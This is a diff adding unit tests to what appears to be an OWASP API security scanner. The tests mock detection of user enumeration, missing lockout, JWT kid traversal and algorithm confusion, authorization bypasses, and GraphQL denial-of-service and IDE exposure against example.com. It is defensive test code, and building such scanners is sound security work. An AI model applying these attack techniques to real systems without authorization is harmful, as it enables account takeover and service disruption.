+                .thenReturn(new HttpResponse(401, "{\"error\":\"No such user\"}", Map.of()));
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(),
+                argThat(body -> body != null && body.contains("\"admin\""))))
+                .thenReturn(new HttpResponse(401, "{\"error\":\"Incorrect password\"}", Map.of()));
+
+        List<Finding> findings = testCase.testUserEnumeration(endpoint, httpClient);
+
+        assertTrue(findings.stream().anyMatch(f -> f.getTitle().contains("User Enumeration")),
+                "Should detect enumeration from the differing 'no such user' vs 'incorrect password' messages");
+    }
+
+    @Test
+    @DisplayName("Does not flag user enumeration when responses are identical")
+    void testNoUserEnumerationWhenResponsesIdentical() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/login", "POST");
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), anyString()))
+                .thenReturn(new HttpResponse(401, "{\"error\":\"Invalid username or password\"}", Map.of()));
+
+        List<Finding> findings = testCase.testUserEnumeration(endpoint, httpClient);
+
+        assertTrue(findings.isEmpty(), "Should not flag enumeration when every response is identical");
+    }
+
+    // ── brute-force lockout (#97) ─────────────────────────────────────────────
+
+    @Test
+    @DisplayName("Detects missing lockout when repeated failed logins never trigger rate limiting")
+    void testMissingLockoutDetected() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/login", "POST");
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), anyString()))
+                .thenReturn(new HttpResponse(401, "{\"error\":\"Invalid username or password\"}", Map.of()));
+
+        List<Finding> findings = testCase.testBruteForceLockout(endpoint, httpClient);
+
+        assertTrue(findings.stream().anyMatch(f -> f.getTitle().contains("No Account Lockout")),
+                "Should flag missing lockout when no attempt is ever rate-limited");
+    }
+
+    @Test
+    @DisplayName("Does not flag missing lockout when rate limiting kicks in")
+    void testLockoutPresent() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/login", "POST");
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), anyString()))
+                .thenReturn(new HttpResponse(401, "{\"error\":\"Invalid username or password\"}", Map.of()))
+                .thenReturn(new HttpResponse(401, "{\"error\":\"Invalid username or password\"}", Map.of()))
+                .thenReturn(new HttpResponse(429, "{\"error\":\"Too many attempts\"}", Map.of()));
+
+        List<Finding> findings = testCase.testBruteForceLockout(endpoint, httpClient);
+
+        assertTrue(findings.isEmpty(), "Should not flag missing lockout once a 429 response is observed");
+    }
+
+    // ── JWT kid path traversal (#99) ──────────────────────────────────────────
+
+    @Test
+    @DisplayName("Detects JWT kid path traversal when a token signed with an empty secret is accepted")
+    void testJwtKidPathTraversalDetected() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/profile", "GET", "application/json", null, true);
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.getWithStatus(anyString(), eq(Map.of())))
+                .thenReturn(new HttpResponse(401, "{\"error\":\"unauthorized\"}", Map.of()));
+        when(httpClient.getWithStatus(anyString(), argThat(h -> h != null && h.containsKey("Authorization"))))
+                .thenReturn(new HttpResponse(200, "{\"data\":\"secret\"}", Map.of()));
+
+        List<Finding> findings = testCase.testJwtKidPathTraversal(endpoint, httpClient);
+
+        assertFalse(findings.isEmpty(), "Should detect the kid path-traversal bypass");
+        assertEquals("JWT 'kid' Path Traversal Accepted", findings.get(0).getTitle());
+    }
+
+    @Test
+    @DisplayName("Does not flag JWT kid path traversal when the forged token is rejected")
+    void testJwtKidPathTraversalNotDetectedWhenRejected() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/profile", "GET", "application/json", null, true);
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.getWithStatus(anyString(), anyMap()))
+                .thenReturn(new HttpResponse(401, "{\"error\":\"unauthorized\"}", Map.of()));
+
+        List<Finding> findings = testCase.testJwtKidPathTraversal(endpoint, httpClient);
+        assertTrue(findings.isEmpty());
+    }
+
+    @Test
+    @DisplayName("Skips JWT kid path traversal test on publicly accessible endpoints")
+    void testJwtKidPathTraversalSkippedOnPublicEndpoint() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/profile", "GET", "application/json", null, true);
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.getWithStatus(anyString(), anyMap()))
+                .thenReturn(new HttpResponse(200, "{\"data\":\"public\"}", Map.of()));
+
+        List<Finding> findings = testCase.testJwtKidPathTraversal(endpoint, httpClient);
+        assertTrue(findings.isEmpty(), "Should skip when baseline (no auth) already succeeds");
+    }
+
+    // ── JWT algorithm confusion (#99) ──────────────────────────────────────────
+
+    @Test
+    @DisplayName("Detects RS256-to-HS256 algorithm confusion when a JWKS is exposed and the forged token is accepted")
+    void testJwtAlgorithmConfusionDetected() throws Exception {
+        EndpointInfo endpoint = new EndpointInfo("/api/profile", "GET", "application/json", null, true);
+        endpoint.setBaseUrl("https://example.com");
+
+        KeyPairGenerator keyGen = KeyPairGenerator.getInstance("RSA");
+        keyGen.initialize(2048);
+        KeyPair keyPair = keyGen.generateKeyPair();
+        RSAPublicKey publicKey = (RSAPublicKey) keyPair.getPublic();
+        String n = Base64.getUrlEncoder().withoutPadding().encodeToString(publicKey.getModulus().toByteArray());
+        String e = Base64.getUrlEncoder().withoutPadding().encodeToString(publicKey.getPublicExponent().toByteArray());
+        String jwks = String.format("{\"keys\":[{\"kty\":\"RSA\",\"n\":\"%s\",\"e\":\"%s\"}]}", n, e);
+
+        when(httpClient.getWithStatus(argThat(url -> url != null && url.contains("jwks")), anyMap()))
+                .thenReturn(new HttpResponse(200, jwks, Map.of()));
+        when(httpClient.getWithStatus(argThat(url -> url != null && !url.contains("jwks")), eq(Map.of())))
+                .thenReturn(new HttpResponse(401, "{\"error\":\"unauthorized\"}", Map.of()));
+        when(httpClient.getWithStatus(argThat(url -> url != null && !url.contains("jwks")),
+                argThat(h -> h != null && h.containsKey("Authorization"))))
+                .thenReturn(new HttpResponse(200, "{\"data\":\"secret\"}", Map.of()));
+
+        List<Finding> findings = testCase.testJwtAlgorithmConfusion(endpoint, httpClient);
+
+        assertFalse(findings.isEmpty(), "Should detect algorithm confusion when the forged token is accepted");
+        assertEquals("JWT Algorithm Confusion (RS256 to HS256) Accepted", findings.get(0).getTitle());
+    }
+
+    @Test
+    @DisplayName("Skips JWT algorithm confusion test when no JWKS is exposed")
+    void testJwtAlgorithmConfusionSkippedWithoutJwks() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/profile", "GET", "application/json", null, true);
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.getWithStatus(anyString(), anyMap()))
+                .thenReturn(new HttpResponse(404, "", Map.of()));
+
+        List<Finding> findings = testCase.testJwtAlgorithmConfusion(endpoint, httpClient);
+        assertTrue(findings.isEmpty(), "Should skip without any exposed JWKS to build a forged token from");
+    }
+
+    // ── JWT jku processing detection (#99) ─────────────────────────────────────
+
+    @Test
+    @DisplayName("Detects jku header processing when the probe request times out")
+    void testJwtJkuProcessingDetectedViaTimeout() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/profile", "GET", "application/json", null, true);
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.getWithStatus(anyString(), eq(Map.of())))
+                .thenReturn(new HttpResponse(401, "{\"error\":\"unauthorized\"}", Map.of()));
+        when(httpClient.getWithStatus(anyString(), argThat(h -> h != null && h.containsKey("Authorization"))))
+                .thenThrow(new IOException("Read timed out"));
+
+        List<Finding> findings = testCase.testJwtJkuProcessing(endpoint, httpClient);
+
+        assertFalse(findings.isEmpty(), "Should detect jku processing from the timeout");
+        assertTrue(findings.get(0).getTitle().contains("jku"));
+    }
+
+    @Test
+    @DisplayName("Does not flag jku processing when the response is fast and unremarkable")
+    void testJwtJkuProcessingNotDetectedWhenFast() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/profile", "GET", "application/json", null, true);
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.getWithStatus(anyString(), anyMap()))
+                .thenReturn(new HttpResponse(401, "{\"error\":\"unauthorized\"}", Map.of()));
+
+        List<Finding> findings = testCase.testJwtJkuProcessing(endpoint, httpClient);
+        assertTrue(findings.isEmpty());
     }
 }

--- a/src/test/java/org/owasp/astf/testcases/BrokenFunctionLevelAuthorizationTestCaseTest.java
+++ b/src/test/java/org/owasp/astf/testcases/BrokenFunctionLevelAuthorizationTestCaseTest.java
@@ -137,6 +137,53 @@ class BrokenFunctionLevelAuthorizationTestCaseTest {
     }
 
     @Test
+    @DisplayName("Detects BFLA via privilege-tier path substitution (regression: crAPI's /user/videos vs /admin/videos)")
+    void testPrivilegeTierPathSubstitutionDetected() throws IOException {
+        // crAPI's real vulnerability: DELETE /identity/api/v2/user/videos/{id} always denies,
+        // but the sibling DELETE /identity/api/v2/admin/videos/{id} succeeds with the same,
+        // non-admin token — confirmed by reading crAPI's actual ProfileController.java source.
+        EndpointInfo endpoint = new EndpointInfo("/identity/api/v2/user/videos/42", "DELETE");
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.deleteWithStatus(eq("https://example.com/identity/api/v2/user/videos/42"), anyMap()))
+                .thenReturn(new HttpResponse(403, "{\"error\":\"forbidden\"}", Map.of()));
+        when(httpClient.deleteWithStatus(eq("https://example.com/identity/api/v2/admin/videos/42"), anyMap()))
+                .thenReturn(new HttpResponse(200, "{\"message\":\"video deleted\"}", Map.of()));
+
+        List<Finding> findings = testCase.testPrivilegeTierPathSubstitution(endpoint, httpClient);
+
+        assertFalse(findings.isEmpty(), "Should detect privilege-tier path substitution BFLA");
+        assertEquals("Broken Function Level Authorization (Privilege-Tier Path Substitution)",
+                findings.get(0).getTitle());
+    }
+
+    @Test
+    @DisplayName("Does not flag privilege-tier substitution when the original request already succeeds")
+    void testPrivilegeTierPathSubstitutionNotFlaggedWhenOriginalSucceeds() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/identity/api/v2/user/videos/42", "DELETE");
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.deleteWithStatus(anyString(), anyMap()))
+                .thenReturn(new HttpResponse(200, "{\"message\":\"ok\"}", Map.of()));
+
+        List<Finding> findings = testCase.testPrivilegeTierPathSubstitution(endpoint, httpClient);
+
+        assertTrue(findings.isEmpty(),
+                "Should not flag substitution when the original (non-substituted) request already succeeds");
+    }
+
+    @Test
+    @DisplayName("Does not attempt privilege-tier substitution when no low-privilege segment is present")
+    void testPrivilegeTierPathSubstitutionSkippedWithoutMatchingSegment() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/api/orders/42", "DELETE");
+        endpoint.setBaseUrl("https://example.com");
+
+        List<Finding> findings = testCase.testPrivilegeTierPathSubstitution(endpoint, httpClient);
+
+        assertTrue(findings.isEmpty(), "Should not attempt substitution without a matching path segment");
+    }
+
+    @Test
     @DisplayName("Should handle exceptions gracefully")
     void testExceptionHandling() throws IOException {
         EndpointInfo endpoint = new EndpointInfo("/api/users", "GET");

--- a/src/test/java/org/owasp/astf/testcases/BrokenObjectLevelAuthorizationTestCaseTest.java
+++ b/src/test/java/org/owasp/astf/testcases/BrokenObjectLevelAuthorizationTestCaseTest.java
@@ -193,6 +193,36 @@ class BrokenObjectLevelAuthorizationTestCaseTest {
     }
 
     @Test
+    @DisplayName("Cross-user PUT sends a realistic body instead of '{}' (regression: VAmPI password-change gap)")
+    void testCrossUserBolaOnPutUsesRealisticBodyNotEmpty() throws IOException {
+        // VAmPI's password-change endpoint resolves and is reachable, but sending an empty "{}"
+        // body never exercises the actual password-change semantics the vulnerability is about.
+        EndpointInfo endpoint = new EndpointInfo(
+                "/users/v1/name1/password", "PUT", "application/json", null, true);
+        endpoint.setResolvedFromTemplate(true);
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.getSecondaryAuthHeaders())
+                .thenReturn(Map.of("Authorization", "Bearer secondary-user-token"));
+        when(httpClient.putWithStatus(anyString(), anyMap(), anyString(), anyString()))
+                .thenReturn(new HttpResponse(200, "{\"message\":\"password updated\"}", Map.of()));
+
+        List<Finding> findings = testCase.execute(endpoint, httpClient);
+
+        assertTrue(findings.stream().anyMatch(f -> f.getTitle().contains("Cross-User Access Confirmed")),
+                "Should still detect cross-user access on the PUT");
+
+        org.mockito.ArgumentCaptor<String> bodyCaptor = org.mockito.ArgumentCaptor.forClass(String.class);
+        org.mockito.Mockito.verify(httpClient, org.mockito.Mockito.atLeastOnce())
+                .putWithStatus(anyString(), anyMap(), anyString(), bodyCaptor.capture());
+        assertTrue(bodyCaptor.getAllValues().stream().anyMatch(body -> body.contains("password")),
+                "Request body must contain a real 'password' field, not an empty '{}' — " +
+                "an empty body reaches the endpoint but never exercises password-change behavior");
+        assertTrue(bodyCaptor.getAllValues().stream().noneMatch(body -> body.equals("{}")),
+                "Should never fall back to an empty '{}' body for a state-changing request");
+    }
+
+    @Test
     @DisplayName("Handles exceptions gracefully")
     void testExceptionHandling() throws IOException {
         EndpointInfo endpoint = new EndpointInfo("/api/users/1", "GET");

--- a/src/test/java/org/owasp/astf/testcases/BrokenObjectLevelAuthorizationTestCaseTest.java
+++ b/src/test/java/org/owasp/astf/testcases/BrokenObjectLevelAuthorizationTestCaseTest.java
@@ -147,7 +147,53 @@ class BrokenObjectLevelAuthorizationTestCaseTest {
     }
 
     @Test
-    @DisplayName("Should handle exceptions gracefully")
+    @DisplayName("Resolves an unresolved path template (e.g. VAmPI's {book_title}) to a real value and detects BOLA (regression, #95)")
+    void testResolvesTemplatePlaceholderAndDetectsCrossUserBola() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/books/v1/{book_title}", "GET", "application/json", null, true);
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.getSecondaryAuthHeaders())
+                .thenReturn(Map.of("Authorization", "Bearer secondary-user-token"));
+
+        // The collection endpoint (placeholder segment + everything after it stripped) returns
+        // a list of real books — "bookTitle82" is the plausible identifier to resolve to.
+        when(httpClient.getWithStatus(eq("https://example.com/books/v1"), eq(Map.of())))
+                .thenReturn(new HttpResponse(200,
+                        "[{\"book_title\":\"bookTitle82\",\"secret_content\":\"top secret\"}]", Map.of()));
+
+        // Both identities can read the resolved, real object with no ID substitution.
+        when(httpClient.getWithStatus(eq("https://example.com/books/v1/bookTitle82"), eq(Map.of())))
+                .thenReturn(new HttpResponse(200, "{\"secret_content\":\"top secret\"}", Map.of()));
+        when(httpClient.getWithStatus(eq("https://example.com/books/v1/bookTitle82"),
+                eq(Map.of("Authorization", "Bearer secondary-user-token"))))
+                .thenReturn(new HttpResponse(200, "{\"secret_content\":\"top secret\"}", Map.of()));
+
+        List<Finding> findings = testCase.execute(endpoint, httpClient);
+
+        assertTrue(findings.stream().anyMatch(f -> f.getTitle().contains("Cross-User Access Confirmed")),
+                "Should resolve {book_title} to a real value and detect the cross-user BOLA on it");
+    }
+
+    @Test
+    @DisplayName("Falls back to the original (unresolved) endpoint when the collection lookup fails")
+    void testTemplatePlaceholderResolutionFailsGracefully() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/books/v1/{book_title}", "GET", "application/json", null, true);
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.getSecondaryAuthHeaders())
+                .thenReturn(Map.of("Authorization", "Bearer secondary-user-token"));
+        // Collection lookup fails (404) — nothing to resolve to.
+        when(httpClient.getWithStatus(eq("https://example.com/books/v1"), eq(Map.of())))
+                .thenReturn(new HttpResponse(404, "", Map.of()));
+
+        assertDoesNotThrow(() -> testCase.execute(endpoint, httpClient));
+        List<Finding> findings = testCase.execute(endpoint, httpClient);
+        assertTrue(findings.stream().noneMatch(f -> f.getTitle().contains("Cross-User Access Confirmed")),
+                "Should not attempt BOLA testing on a still-unresolved placeholder path");
+    }
+
+    @Test
+    @DisplayName("Handles exceptions gracefully")
     void testExceptionHandling() throws IOException {
         EndpointInfo endpoint = new EndpointInfo("/api/users/1", "GET");
         endpoint.setBaseUrl("https://example.com");

--- a/src/test/java/org/owasp/astf/testcases/GraphQLSecurityTestCaseTest.java
+++ b/src/test/java/org/owasp/astf/testcases/GraphQLSecurityTestCaseTest.java
@@ -534,6 +534,50 @@ class GraphQLSecurityTestCaseTest {
     }
 
     @Test
+    @DisplayName("Extracts every candidate field, not just the first 5 (regression: DVGA importPaste/uploadPaste live-test gap)")
+    void testExtractStringArgFieldsHasNoArtificialCap() {
+        StringBuilder fieldsJson = new StringBuilder();
+        int fieldCount = 8;
+        for (int i = 0; i < fieldCount; i++) {
+            if (i > 0) fieldsJson.append(",");
+            fieldsJson.append(String.format("""
+                    { "name": "field%d", "args": [
+                        { "name": "value", "type": { "name": "String", "kind": "SCALAR" } }
+                    ] }
+                    """, i));
+        }
+        String introspection = "{\"data\":{\"__schema\":{\"mutationType\":{\"fields\":[" + fieldsJson + "]}}}}";
+
+        List<?> results = testCase.extractStringArgFields(introspection, "mutationType");
+
+        assertEquals(fieldCount, results.size(),
+                "Every field with a String argument must be tested — a prior 5-field cap silently " +
+                "dropped DVGA's importPaste (SSRF/OS injection) and uploadPaste (path traversal) from testing.");
+    }
+
+    @Test
+    @DisplayName("Excludes a token-shaped argument as the injection target, but still tests the field if it has another string arg (regression: DVGA me(token) crash)")
+    void testExtractStringArgFieldsSkipsTokenLikeArgAsTarget() {
+        String introspection = """
+                {"data":{"__schema":{"queryType":{"fields":[
+                    { "name": "me", "args": [
+                        { "name": "token", "type": { "name": "String", "kind": "SCALAR" } }
+                    ] },
+                    { "name": "search", "args": [
+                        { "name": "token", "type": { "name": "String", "kind": "SCALAR" } },
+                        { "name": "keyword", "type": { "name": "String", "kind": "SCALAR" } }
+                    ] }
+                ]}}}}
+                """;
+
+        List<?> results = testCase.extractStringArgFields(introspection, "queryType");
+
+        assertEquals(1, results.size(),
+                "'me' has only a token-shaped string arg, so it must be excluded entirely — feeding " +
+                "generic SQL/XSS payloads into a token argument crashed DVGA's JWT decoder in live testing");
+    }
+
+    @Test
     @DisplayName("Flags GraphQL resolver injection when a mutation reflects an unescaped XSS payload")
     void testResolverInjectionDetected() throws IOException {
         EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
@@ -783,5 +827,110 @@ class GraphQLSecurityTestCaseTest {
                 .thenThrow(new IOException("Connection refused"));
 
         assertDoesNotThrow(() -> testCase.execute(endpoint, httpClient));
+    }
+
+    // ── stack trace / debug error disclosure ─────────────────────────────────
+
+    @Test
+    @DisplayName("Flags GraphQL stack trace disclosure when a malformed query leaks a Python traceback (regression: DVGA gap)")
+    void testStackTraceDisclosureDetected() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), anyString()))
+                .thenReturn(new HttpResponse(500,
+                        "Traceback (most recent call last):\n  File \"app.py\", line 42, in resolve\n" +
+                        "    raise ValueError('bad type')\n", Map.of()));
+
+        List<Finding> findings = testCase.testStackTraceDisclosure(endpoint, httpClient);
+
+        assertFalse(findings.isEmpty(), "Should detect the leaked Python traceback");
+        assertEquals("GraphQL Stack Trace / Debug Error Disclosure", findings.get(0).getTitle());
+    }
+
+    @Test
+    @DisplayName("Does not flag stack trace disclosure when errors are generic")
+    void testNoStackTraceDisclosureWhenGeneric() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), anyString()))
+                .thenReturn(new HttpResponse(400, "{\"errors\":[{\"message\":\"Bad request\"}]}", Map.of()));
+
+        List<Finding> findings = testCase.testStackTraceDisclosure(endpoint, httpClient);
+        assertTrue(findings.isEmpty());
+    }
+
+    // ── login mutation brute-force ───────────────────────────────────────────
+
+    private static final String LOGIN_MUTATION_INTROSPECTION = """
+            {
+              "data": {
+                "__schema": {
+                  "mutationType": {
+                    "fields": [
+                      {
+                        "name": "login",
+                        "args": [
+                          { "name": "username", "type": { "name": "String", "kind": "SCALAR" } },
+                          { "name": "password", "type": { "name": "String", "kind": "SCALAR" } }
+                        ],
+                        "type": { "name": "AuthPayload", "kind": "OBJECT" }
+                      }
+                    ]
+                  }
+                }
+              }
+            }
+            """;
+
+    @Test
+    @DisplayName("Flags missing brute-force lockout on a discovered GraphQL login mutation (regression: DVGA gap)")
+    void testLoginMutationBruteForceDetected() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), contains("__schema")))
+                .thenReturn(new HttpResponse(200, LOGIN_MUTATION_INTROSPECTION, Map.of()));
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), contains("mutation{login")))
+                .thenReturn(new HttpResponse(200, "{\"errors\":[{\"message\":\"Invalid credentials\"}]}", Map.of()));
+
+        List<Finding> findings = testCase.testLoginMutationBruteForce(endpoint, httpClient);
+
+        assertFalse(findings.isEmpty(), "Should flag missing lockout after repeated failed attempts");
+        assertEquals("No Account Lockout or Rate Limiting on GraphQL Login Mutation", findings.get(0).getTitle());
+    }
+
+    @Test
+    @DisplayName("Does not flag brute-force when the server rate-limits repeated login attempts")
+    void testLoginMutationBruteForceNotFlaggedWhenRateLimited() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), contains("__schema")))
+                .thenReturn(new HttpResponse(200, LOGIN_MUTATION_INTROSPECTION, Map.of()));
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), contains("mutation{login")))
+                .thenReturn(new HttpResponse(429, "{\"errors\":[{\"message\":\"Too many requests\"}]}", Map.of()));
+
+        List<Finding> findings = testCase.testLoginMutationBruteForce(endpoint, httpClient);
+        assertTrue(findings.isEmpty(), "Should not flag brute-force when the server properly rate-limits");
+    }
+
+    @Test
+    @DisplayName("Does not attempt brute-force when no login-shaped mutation is discovered")
+    void testLoginMutationBruteForceSkippedWhenNoLoginMutation() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+        endpoint.setBaseUrl("https://example.com");
+
+        String introspection = """
+                {"data":{"__schema":{"mutationType":{"fields":[
+                    {"name":"createPost","args":[{"name":"title","type":{"name":"String","kind":"SCALAR"}}]}
+                ]}}}}
+                """;
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), anyString()))
+                .thenReturn(new HttpResponse(200, introspection, Map.of()));
+
+        List<Finding> findings = testCase.testLoginMutationBruteForce(endpoint, httpClient);
+        assertTrue(findings.isEmpty(), "Should not run brute-force testing without a login mutation to target");
     }
 }

--- a/src/test/java/org/owasp/astf/testcases/GraphQLSecurityTestCaseTest.java
+++ b/src/test/java/org/owasp/astf/testcases/GraphQLSecurityTestCaseTest.java
@@ -253,6 +253,249 @@ class GraphQLSecurityTestCaseTest {
         assertTrue(findings.isEmpty(), "Non-GraphQL endpoints should produce no findings");
     }
 
+    // ── field duplication / alias / circular fragment DoS (#101) ──────────────
+
+    @Test
+    @DisplayName("Detects field duplication DoS when the repeated-selection request times out")
+    void testFieldDuplicationDetectedViaTimeout() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+
+        // Distinguish the short single-copy baseline from the ~60x-repeated probe by length
+        // rather than fragile brace-counting substring matching.
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), argThat(q -> q != null && q.length() < 200)))
+                .thenReturn(ok("{\"data\":{\"__schema\":{\"types\":[]}}}"));
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), argThat(q -> q != null && q.length() >= 200)))
+                .thenThrow(new IOException("Read timed out"));
+
+        List<Finding> findings = testCase.testFieldDuplicationAttack(endpoint, httpClient);
+
+        assertFalse(findings.isEmpty(), "Should detect field duplication DoS from the timeout");
+        assertEquals("GraphQL Field Duplication Denial of Service", findings.get(0).getTitle());
+        assertEquals(Severity.MEDIUM, findings.get(0).getSeverity());
+    }
+
+    @Test
+    @DisplayName("Does not flag field duplication when both requests are fast")
+    void testFieldDuplicationNotDetectedWhenFast() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), anyString()))
+                .thenReturn(ok("{\"data\":{\"__schema\":{\"types\":[]}}}"));
+
+        List<Finding> findings = testCase.testFieldDuplicationAttack(endpoint, httpClient);
+        assertTrue(findings.isEmpty());
+    }
+
+    @Test
+    @DisplayName("Detects alias-based DoS when the aliased-repetition request times out")
+    void testAliasBasedAttackDetectedViaTimeout() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(),
+                argThat(q -> q != null && q.contains("a59:"))))
+                .thenThrow(new IOException("Read timed out"));
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(),
+                argThat(q -> q != null && !q.contains("a59:"))))
+                .thenReturn(ok("{\"data\":{\"a0\":{\"types\":[]}}}"));
+
+        List<Finding> findings = testCase.testAliasBasedAttack(endpoint, httpClient);
+
+        assertFalse(findings.isEmpty(), "Should detect alias-based DoS from the timeout");
+        assertEquals("GraphQL Alias-Based Denial of Service", findings.get(0).getTitle());
+    }
+
+    @Test
+    @DisplayName("Does not flag alias-based attack when both requests are fast")
+    void testAliasBasedAttackNotDetectedWhenFast() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), anyString()))
+                .thenReturn(ok("{\"data\":{\"a0\":{\"types\":[]}}}"));
+
+        List<Finding> findings = testCase.testAliasBasedAttack(endpoint, httpClient);
+        assertTrue(findings.isEmpty());
+    }
+
+    @Test
+    @DisplayName("Detects circular fragment DoS when the request times out")
+    void testCircularFragmentDetectedViaTimeout() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), anyString()))
+                .thenThrow(new IOException("Read timed out"));
+
+        List<Finding> findings = testCase.testCircularFragmentAttack(endpoint, httpClient);
+
+        assertFalse(findings.isEmpty(), "Should detect circular fragment DoS from the timeout");
+        assertEquals("GraphQL Circular Fragment Denial of Service", findings.get(0).getTitle());
+        assertEquals(Severity.HIGH, findings.get(0).getSeverity());
+    }
+
+    @Test
+    @DisplayName("Does not flag circular fragment when the server rejects it quickly")
+    void testCircularFragmentNotDetectedWhenRejectedFast() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+
+        when(httpClient.postWithStatus(anyString(), anyMap(), anyString(), anyString()))
+                .thenReturn(new HttpResponse(400,
+                        "{\"errors\":[{\"message\":\"Cannot spread fragment 'A' within itself\"}]}", Map.of()));
+
+        List<Finding> findings = testCase.testCircularFragmentAttack(endpoint, httpClient);
+        assertTrue(findings.isEmpty(), "A fast validation rejection is the correct, safe behavior");
+    }
+
+    // ── GraphQL IDE exposure (#102) ────────────────────────────────────────────
+
+    @Test
+    @DisplayName("Detects an exposed GraphiQL interface")
+    void testGraphiQLExposureDetected() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.getWithStatus(argThat(url -> url != null && url.endsWith("/graphiql")), anyMap()))
+                .thenReturn(new HttpResponse(200, "<html><title>GraphiQL</title></html>", Map.of()));
+        when(httpClient.getWithStatus(argThat(url -> url != null && !url.endsWith("/graphiql")), anyMap()))
+                .thenReturn(new HttpResponse(404, "", Map.of()));
+
+        List<Finding> findings = testCase.testGraphiQLExposure(endpoint, httpClient);
+
+        assertTrue(findings.stream().anyMatch(f -> f.getTitle().equals("GraphQL IDE Exposed in Production")));
+    }
+
+    @Test
+    @DisplayName("Detects a GraphiQL interface gated behind a guessable debug cookie")
+    void testGraphiQLCookieBypassDetected() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.getWithStatus(argThat(url -> url != null && url.endsWith("/graphiql")), eq(Map.of())))
+                .thenReturn(new HttpResponse(403, "Forbidden", Map.of()));
+        when(httpClient.getWithStatus(argThat(url -> url != null && url.endsWith("/graphiql")),
+                argThat(h -> h != null && h.containsKey("Cookie"))))
+                .thenReturn(new HttpResponse(200, "<html><title>GraphiQL</title></html>", Map.of()));
+        when(httpClient.getWithStatus(argThat(url -> url != null && !url.endsWith("/graphiql")), anyMap()))
+                .thenReturn(new HttpResponse(404, "", Map.of()));
+
+        List<Finding> findings = testCase.testGraphiQLExposure(endpoint, httpClient);
+
+        assertTrue(findings.stream().anyMatch(f -> f.getTitle().contains("Guessable Cookie")));
+    }
+
+    @Test
+    @DisplayName("Does not flag GraphiQL exposure when every IDE path is blocked")
+    void testGraphiQLExposureNotDetectedWhenBlocked() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+        endpoint.setBaseUrl("https://example.com");
+
+        when(httpClient.getWithStatus(anyString(), anyMap()))
+                .thenReturn(new HttpResponse(404, "", Map.of()));
+
+        List<Finding> findings = testCase.testGraphiQLExposure(endpoint, httpClient);
+        assertTrue(findings.isEmpty());
+    }
+
+    // ── deny-list bypass via fragment wrapping (#102) ─────────────────────────
+
+    @Test
+    @DisplayName("Detects deny-list bypass when a blocked field succeeds via fragment wrapping")
+    void testDenyListBypassDetected() throws IOException {
+        EndpointInfo endpoint = new EndpointInfo("/graphql", "POST");
+        String queryIntrospection = """
+                {
